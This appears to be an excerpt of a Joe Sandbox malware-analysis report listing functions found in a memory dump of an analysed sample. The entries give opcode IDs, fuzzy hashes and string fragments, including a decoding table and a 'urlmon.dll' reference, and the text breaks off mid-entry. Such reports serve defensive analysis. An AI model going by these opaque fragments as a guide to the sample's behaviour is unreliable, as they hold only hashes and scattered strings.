                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4edda55ce172b60fa910730bd6b345c24a70decd6b2c01390df295fe35c320fa
                                                                                      • Instruction ID: 15c93178f4f2f4a170086c520520cba07d9ca53ad119f7655287ff71730ee8f5
                                                                                      • Opcode Fuzzy Hash: 4edda55ce172b60fa910730bd6b345c24a70decd6b2c01390df295fe35c320fa
                                                                                      • Instruction Fuzzy Hash: D0F0A7B36102166BEB105A5DEC45B86F7DCFB85339F240223FE6C87251DA72F451C2A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D59308 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26bceb9c3be23a8c219c13decd2f61f5de1817fdaa7bdb3715a7f45e56d888e9
                                                                                      • Instruction ID: 227e748bda85dbe854ff1c9a79d27d0bc757e1d7dc4c2c7918c953f0e8b6fb09
                                                                                      • Opcode Fuzzy Hash: 26bceb9c3be23a8c219c13decd2f61f5de1817fdaa7bdb3715a7f45e56d888e9
                                                                                      • Instruction Fuzzy Hash: 2AF030B1B40104BBFB11DA54CC82F7A737CDB89A14F104299FA04DA1D4E6B1B91146A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D50410 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35afc1af474eb9c1c955cf8ee66eb982e85963064d99355fa064fc9ca42809c8
                                                                                      • Instruction ID: e5e3eb7eab4bd0062ca2882204524244a4b576733e2a3779ee43db356a6c936b
                                                                                      • Opcode Fuzzy Hash: 35afc1af474eb9c1c955cf8ee66eb982e85963064d99355fa064fc9ca42809c8
                                                                                      • Instruction Fuzzy Hash: F6F0E9B1A182557AEF20AFE09C85D7B73B8EB58204F0001D5ED098B192D531EE458761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5F937 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ac6c2b5893f55610fc12415c764ef17e557f8495f3409498e125e3ca549058a
                                                                                      • Instruction ID: 944c95533912e6285f8ff0859645e193d24bdd1c832f712989ff26006d2151fc
                                                                                      • Opcode Fuzzy Hash: 8ac6c2b5893f55610fc12415c764ef17e557f8495f3409498e125e3ca549058a
                                                                                      • Instruction Fuzzy Hash: A9F01CB6240249BBD710EF99DC81EAB77ACEFC9714F008419FA18A7241D670B9518BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D604C7 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c70116704e255d0889dfc3debcc1c7f33140e4e56f37c4381d7cd67408a62e67
                                                                                      • Instruction ID: acbce44c42702ea35db39ee63ddff0775db271b0398fe18ddb5b5b91fc247687
                                                                                      • Opcode Fuzzy Hash: c70116704e255d0889dfc3debcc1c7f33140e4e56f37c4381d7cd67408a62e67
                                                                                      • Instruction Fuzzy Hash: 8BE06D716002447BD614EE58DC85EAB77ACEFC9714F008418F958A7241C670B91087B5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3B43B Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7a9912697d821d139ba8690500d8e2fa140e2ba504739821949c4c6a163f1e7a
                                                                                      • Instruction ID: 2a4a96cdb3d17de5352cb319b33a243284bb4975bb75c7e95fea49bcf5fa2fa9
                                                                                      • Opcode Fuzzy Hash: 7a9912697d821d139ba8690500d8e2fa140e2ba504739821949c4c6a163f1e7a
                                                                                      • Instruction Fuzzy Hash: F6E0D873514216AB8B108E59EC848C7FB9CFE8A3353110323EA6C47551DB31F401C6E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D50377 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 943963aa0062aad987254ca54776de39da8556ff042d7ac3e0a6c1700e3a5f67
                                                                                      • Instruction ID: e09079e6b7cc47992c4e278eae1e23ac2a471707550cd730fc91c53ece2bee98
                                                                                      • Opcode Fuzzy Hash: 943963aa0062aad987254ca54776de39da8556ff042d7ac3e0a6c1700e3a5f67
                                                                                      • Instruction Fuzzy Hash: E6F08271915208EBDF14DF64D881BDEBBB4EB04320F10476DE8249B280EA34A7508781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D62157 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4bec4b15cc9666143c1b8d56b095709b2f1ec30bb08cbb3d59eb3d4d3d149f2
                                                                                      • Instruction ID: fd33dcaad5a8135f3230de13b167f94b1bc455095c479be246fd7f44b91d8ab0
                                                                                      • Opcode Fuzzy Hash: b4bec4b15cc9666143c1b8d56b095709b2f1ec30bb08cbb3d59eb3d4d3d149f2
                                                                                      • Instruction Fuzzy Hash: F1E0DF3270022033D22066D98C06FA7779CCBC0BA4F0800A5FF099B301E278B80186E4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D60217 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71e583efc293f1664b149dfc91e6be398722987e6ad27d67abf4a710c331ad5f
                                                                                      • Instruction ID: fee345847e661b0b6b1449e51ee6d28d2308b1256de411dd8c19cc69108e5d48
                                                                                      • Opcode Fuzzy Hash: 71e583efc293f1664b149dfc91e6be398722987e6ad27d67abf4a710c331ad5f
                                                                                      • Instruction Fuzzy Hash: 7BE04632A412047BE220AB69DC41EEB77ACDBC6B18F508025FA1CA7241CAB0B90087B0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 04D4C979 Relevance: 51.4, Strings: 41, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
                                                                                      • Opcode ID: 4216aa1ad783ebeec50ca5c9cc9f78cc0a55612d46b49f970030c4dcc95afe9f
                                                                                      • Instruction ID: 79625abd883388c2323e8f280347b35cca8bca19cbcbf8540f0720330a8118b7
                                                                                      • Opcode Fuzzy Hash: 4216aa1ad783ebeec50ca5c9cc9f78cc0a55612d46b49f970030c4dcc95afe9f
                                                                                      • Instruction Fuzzy Hash: FE910FF08052A98ADB118F59A5603DFBF71BBC5204F1581E9C6AA7B243C3BE4E45DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D4C987 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
                                                                                      • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                      • Instruction ID: a992619d1dcd4d2e80ced4d12be02a6a7250e213c8bd4afa3b0ccf25ac2f09cc
                                                                                      • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                      • Instruction Fuzzy Hash: 09910FF08052A98ACB118F55A5603DFBF71BBC5204F1581E9C6AA7B243C3BE4E85DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D43143 Relevance: 42.6, Strings: 34, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !S$&$($)$)$+$0x$2Z$5$=$Aw$B!$DR$J$K$Q$S$S$V$V$Xd$Y$[$\j$a$a~$b$b$da$g$j$pB$s$K
                                                                                      • API String ID: 0-4275489075
                                                                                      • Opcode ID: 87cab876633dfd4d294c9fcd45dc65df986263befa45e5011a590776c5a04d30
                                                                                      • Instruction ID: db752be4593483575bcccd8a681c29bfcf0ab64f14c6566d00cddbbd3663c6be
                                                                                      • Opcode Fuzzy Hash: 87cab876633dfd4d294c9fcd45dc65df986263befa45e5011a590776c5a04d30
                                                                                      • Instruction Fuzzy Hash: B1B144B0D05669CBEB60CF85C9987DEBBB1BB45308F1085D9C55C3B281C7BA0A89CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5A437 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                      • API String ID: 0-1002149817
                                                                                      • Opcode ID: 4155b6c8627cf53edfc1f2f8abcf7aaaca18328939f587cea7dc54faac2ca0a9
                                                                                      • Instruction ID: 7a486e73c7cc90682c6c4a2752209d57fea5aa060b841deb136d79e6a4b64608
                                                                                      • Opcode Fuzzy Hash: 4155b6c8627cf53edfc1f2f8abcf7aaaca18328939f587cea7dc54faac2ca0a9
                                                                                      • Instruction Fuzzy Hash: 16C11DB1D002689EEF60DFA4CD44BEEBBB9EF45304F0081D9D548AB251E7B55A88CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D578A7 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                      • API String ID: 0-3236418099
                                                                                      • Opcode ID: da049755a0726cd7d1306551220a95970b0a8337fb7b47fd355d8c5146e59f35
                                                                                      • Instruction ID: 49a2e31339fb2963a17f603ca9094732248ffb54d108c3eb0afbba14ead0baae
                                                                                      • Opcode Fuzzy Hash: da049755a0726cd7d1306551220a95970b0a8337fb7b47fd355d8c5146e59f35
                                                                                      • Instruction Fuzzy Hash: BC9121B1A00218AFEB21EB94CC85FEE77B9EF44704F144199EA09A6140EB756B85CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5789F Relevance: 25.1, Strings: 20, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                      • API String ID: 0-3236418099
                                                                                      • Opcode ID: 8304ed62d903beac23a84ea8f6103efe8bb7b6df60275ed5bdaf3cce7c40783f
                                                                                      • Instruction ID: a2af0bc6c3ca8060456d9a1e898713fff4933992b5c66b7bffcad553f1e40ddd
                                                                                      • Opcode Fuzzy Hash: 8304ed62d903beac23a84ea8f6103efe8bb7b6df60275ed5bdaf3cce7c40783f
                                                                                      • Instruction Fuzzy Hash: EE41ECB0D003189FEB60DFA5C885BDEBBF9FF05748F1041999508AA241D7B55B89CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D530F7 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                      • API String ID: 0-392141074
                                                                                      • Opcode ID: 9abf1655f854d2ce284cae4749881e49761d1ac7e4b3ad601328f01391d28944
                                                                                      • Instruction ID: af69a741079b341fd0975e4609d3d165908e5c4d21b41a31e8a620a206ccb952
                                                                                      • Opcode Fuzzy Hash: 9abf1655f854d2ce284cae4749881e49761d1ac7e4b3ad601328f01391d28944
                                                                                      • Instruction Fuzzy Hash: BA7122B1E00218ABEB15EBA4CC41FEEB77DFF58704F04459DE609AA140EB7567488FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D4E807 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                      • API String ID: 0-2356907671
                                                                                      • Opcode ID: 952812548657e3addc6459049a13cdb6c38e62b87b819efe281c8f4c43574d83
                                                                                      • Instruction ID: 6eb5e362c6cf136663ad39206c6a446ad106c0f0002211baba9419ad8ef6ae88
                                                                                      • Opcode Fuzzy Hash: 952812548657e3addc6459049a13cdb6c38e62b87b819efe281c8f4c43574d83
                                                                                      • Instruction Fuzzy Hash: AA8150B2E003186BEB51FBA4CC85EEF77BCEF58708F044599A50AA6140EA756748CF71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D47837 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                      • API String ID: 0-685823316
                                                                                      • Opcode ID: 469ec565c094bad94252c0c2dd7be8c746f4f3f9b8b592b256defeeee8d54098
                                                                                      • Instruction ID: 4c6073b5dd02e8b2212d8fc91301742d86a055b5fcfc719a97e7eee1ed3eddf3
                                                                                      • Opcode Fuzzy Hash: 469ec565c094bad94252c0c2dd7be8c746f4f3f9b8b592b256defeeee8d54098
                                                                                      • Instruction Fuzzy Hash: 262161B5D41218AAEF50DFD0DC45BEEB7B9EF08704F048159E608BA180DBB52648CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D57D47 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                      • API String ID: 0-2304485323
                                                                                      • Opcode ID: 869e10abbdeceb13de7ddaeeaec22106c92cfdb53225ddfa277b4cc5580a5e80
                                                                                      • Instruction ID: c5422e2e8eb23f07672bfac3b589a421f78b286bc3935e198f682b4e04c31b56
                                                                                      • Opcode Fuzzy Hash: 869e10abbdeceb13de7ddaeeaec22106c92cfdb53225ddfa277b4cc5580a5e80
                                                                                      • Instruction Fuzzy Hash: 71D1C8B2A01304AFEB50EBE4CC81FEEB7B8FF58308F14491DE5499A144EB79A544CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D57D42 Relevance: 12.7, Strings: 10, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                      • API String ID: 0-2304485323
                                                                                      • Opcode ID: 1e14bb6b656b4e247f7db45ffe12e9ec6d2c498f79153ed34549d1f9e66eefa2
                                                                                      • Instruction ID: 06d919d2d004babeaf50d9ab21fe9393f3c113bb638e40f1c9268e2bd8a879f9
                                                                                      • Opcode Fuzzy Hash: 1e14bb6b656b4e247f7db45ffe12e9ec6d2c498f79153ed34549d1f9e66eefa2
                                                                                      • Instruction Fuzzy Hash: 1481B6B1A01304AFEB50EFA4C881BEEB7B9FF58308F14451DE509AB240EB79A545CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3E3B7 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *$4$4$:$B$J$[$g$w
                                                                                      • API String ID: 0-929430412
                                                                                      • Opcode ID: d4b509ba97d34350b6c445ef4db6dc56da083ce67fae79f9ced878b1620f3cdc
                                                                                      • Instruction ID: 277df851820799d552657db4ab7069c9f79baa697c258004f791407b218f9c6d
                                                                                      • Opcode Fuzzy Hash: d4b509ba97d34350b6c445ef4db6dc56da083ce67fae79f9ced878b1620f3cdc
                                                                                      • Instruction Fuzzy Hash: 6A11BB10D086CAD9DB12C7BC84187AEBFB15F27258F0882D9D4E52B2C2D2795706D7A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D5AC87 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$S$\$a$c$e$l
                                                                                      • API String ID: 0-3322591375
                                                                                      • Opcode ID: d674f6451cde0e4f5239d380c6142ec49843396d235b6c39af4f8221591eea32
                                                                                      • Instruction ID: cf3e78f81af42fcaec28a2bf262cfc046b6a084bc12a3441db69f9f4ce84256a
                                                                                      • Opcode Fuzzy Hash: d674f6451cde0e4f5239d380c6142ec49843396d235b6c39af4f8221591eea32
                                                                                      • Instruction Fuzzy Hash: 48416BB2D10218ABDF50EFA4DC44EEEB7F8FF48714F01469AD90DAB210EB7165458BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52ED7 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: a6be902b3c75202715d456ccf2431012c740054d860f66837447b8e1990b6ac6
                                                                                      • Instruction ID: 00ad52bc4ed36e08e3ab3ff6b94915251aa1c51d05cd22e6d81f29958f73beec
                                                                                      • Opcode Fuzzy Hash: a6be902b3c75202715d456ccf2431012c740054d860f66837447b8e1990b6ac6
                                                                                      • Instruction Fuzzy Hash: 6251C871701304ABEB30EFA9CC44BAAB7F8FF00748F00459AA9499A5A0D7B5B544CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52ED2 Relevance: 7.6, Strings: 6, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: a242118a132c0bd492f2fd17f7b2d0ef56f0347bcea2c6b7cbbaab21abe10785
                                                                                      • Instruction ID: f25be78f409057f16fd7d2fb2d32908aac5a3c0e68b1b62a5c59d6369270b560
                                                                                      • Opcode Fuzzy Hash: a242118a132c0bd492f2fd17f7b2d0ef56f0347bcea2c6b7cbbaab21abe10785
                                                                                      • Instruction Fuzzy Hash: 7901B971E102086BDB10EF99D8056EE7BB8FF41358F40419AEC086B210E7B6694D8BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52647 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
